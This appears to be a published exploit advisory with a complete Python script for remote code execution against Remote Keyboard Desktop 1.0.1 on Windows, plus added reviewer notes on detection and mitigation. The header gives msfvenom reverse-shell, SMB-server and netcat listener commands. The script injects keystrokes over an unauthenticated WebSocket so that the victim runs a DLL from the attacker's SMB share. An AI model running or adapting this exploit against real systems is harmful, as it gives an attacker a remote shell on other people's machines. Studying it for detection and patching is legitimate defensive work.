# Exploit Title: Remote Keyboard Desktop 1.0.1 - Remote Code Execution (RCE)
# Date: 05/17/2025
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://remotecontrolio.web.app/
# Software Link: https://apps.microsoft.com/detail/9n0jw8v5sc9m?hl=neutral&gl=US&ocid=pdpshare
# Version: 1.0.1
# Tested on: Windows 10 Pro Build 19045

# Start Remote Keyboard Desktop on your windows

# Preparing:
#
# 1. Generating payload (dll/exe):
# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.8.105 LPORT=8080 -f dll > shell.dll
# 2. Start smb server: impacket-smbserver SHARE . -smb2support
# 3. nc -lnvp 8080
# 4. python exploit.py

#####

#!/usr/bin/env python3

# NOTE(review): this listing was recovered from a whitespace-collapsed page;
# the indentation below is reconstructed, so the exact nesting of a few
# statements (marked where it matters) should be checked against the original.
#
# Reviewer notes for defenders:
# - What the script exercises: it connects to a WebSocket listener on TCP 8080
#   and sends "keyboard_event" JSON messages. Nothing it sends is a
#   credential, PIN or pairing token; the only handshake extras are
#   User-Agent, Origin and an extensions header, all of which any client can
#   set freely. The server side is not shown here, but per the advisory title
#   that is enough for code execution on version 1.0.1.
# - Effect on the host: the injected keystrokes open the Run dialog and launch
#   a binary from a remote SMB share, so it runs as the logged-on user.
# - Detection: rundll32.exe or cmd.exe whose command line contains a UNC path
#   (\\host\share\...); new entries in the user's RunMRU registry history;
#   outbound SMB (TCP 445) from a workstation to a host that is not a known
#   file server; inbound connections to TCP 8080 from unexpected peers.
# - Mitigation: limit the listener to trusted devices with the host firewall
#   or remove the app where it is not needed; block outbound SMB to untrusted
#   networks; a vendor fix needs to authenticate the peer before accepting
#   input events.

import websocket
import json
import time

target = "192.168.8.105"
lhost = "192.168.8.101"
WS_URL = f"ws://{target}:8080/"
payload = "shell2.dll"  # payload dll/exe filename
debug = False

# Handshake headers. These presumably imitate the vendor's Dart-based client
# (TODO confirm); they identify nothing and must not be treated as a trust
# signal on the server side.
HEADER_LIST = [
    "User-Agent: Dart/3.7 (dart:io)",
    f"Origin: http://{target}:8080",
    "Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits",
]

#SMB_PATH = f"cmd /c \\\\{lhost}\\SHARE\\{payload}" # exe based
SMB_PATH = f"rundll32.exe \\\\{lhost}\\SHARE\\{payload},ExportedFunc"  # dll based

# Characters that are neither letters nor digits, mapped to
# (key name sent on the wire, whether SHIFT must be held).
special_mapping = {
    ' ': ("SPACE", False),
    '/': ("NUMPAD_DIVIDE", False),
    '\\': ("\\", False),
    '.': ("NUMPAD_DECIMAL", False),
    ',': (",", False),
}


def send_key_event(ws, key, key_down):
    """Send one "keyboard_event" message for *key*.

    *key_down* is True for a press and False for a release; "capsLock" is
    always sent as False.
    """
    data = {"key": key, "keyDown": key_down, "capsLock": False}
    ws.send(json.dumps({"command": "keyboard_event", "data": data}))


def send_text(ws, text, delay=0.05):
    """Type *text* one character at a time as press/release pairs.

    Letters are sent upper-cased with SHIFT held for capitals, digits are sent
    as-is, and other characters must appear in ``special_mapping``.

    Raises:
        ValueError: if a character has no key mapping.
    """
    shift_held = False
    for char in text:
        mapped = special_mapping.get(char)
        if mapped is not None:
            key, wants_shift = mapped
        elif char.isalpha():
            key, wants_shift = char.upper(), char.isupper()
        elif char.isdigit():
            key, wants_shift = char, False
        else:
            raise ValueError(f"No key mapping for character: {char!r}")

        # Toggle SHIFT only when the required state differs from the current one.
        if wants_shift != shift_held:
            send_key_event(ws, "SHIFT", wants_shift)
            shift_held = wants_shift

        send_key_event(ws, key, True)
        send_key_event(ws, key, False)
        time.sleep(delay)

    # Never leave SHIFT held once the text is finished.
    if shift_held:
        send_key_event(ws, "SHIFT", False)


def send_key(ws, keys, delay=0.05):
    """Press *keys* in order as a chord, then release them in reverse order."""
    for name in keys:
        send_key_event(ws, name, True)
        # NOTE(review): pause placed inside the press loop; the collapsed
        # source does not show whether it belongs here or after the loop.
        time.sleep(delay)
    for name in reversed(keys):
        send_key_event(ws, name, False)


def on_open(ws):
    """Run the keystroke sequence once the socket is open, then close it."""
    print("Let's start!")
    send_key(ws, ["LEFT_WINDOWS", "R"])
    time.sleep(0.5)  # pause before typing into the Run dialog
    send_text(ws, SMB_PATH)
    send_key(ws, ["RETURN"])
    print("Executing...")
    time.sleep(1.2)
    print("Check your listener!")
    if debug:
        print("\033[42;37mExploit by blue0x1 - github.com/blue0x1\033[0m ")
    # NOTE(review): close() is taken to be unconditional; confirm nesting.
    ws.close()


def on_message(ws, message):
    """Print server messages when debugging is enabled."""
    if not debug:
        return
    print("[=] Received:", message)


def on_error(ws, error):
    """Print socket errors when debugging is enabled."""
    if not debug:
        return
    print("[!] Error:", error)


def on_close(ws, code, reason):
    """Print the close code and reason when debugging is enabled."""
    if not debug:
        return
    print(f"[x] Closed: {code} - {reason}")


if __name__ == "__main__":
    websocket.enableTrace(debug)
    handlers = {
        "on_open": on_open,
        "on_message": on_message,
        "on_error": on_error,
        "on_close": on_close,
    }
    ws = websocket.WebSocketApp(WS_URL, header=HEADER_LIST, **handlers)
    ws.run_forever()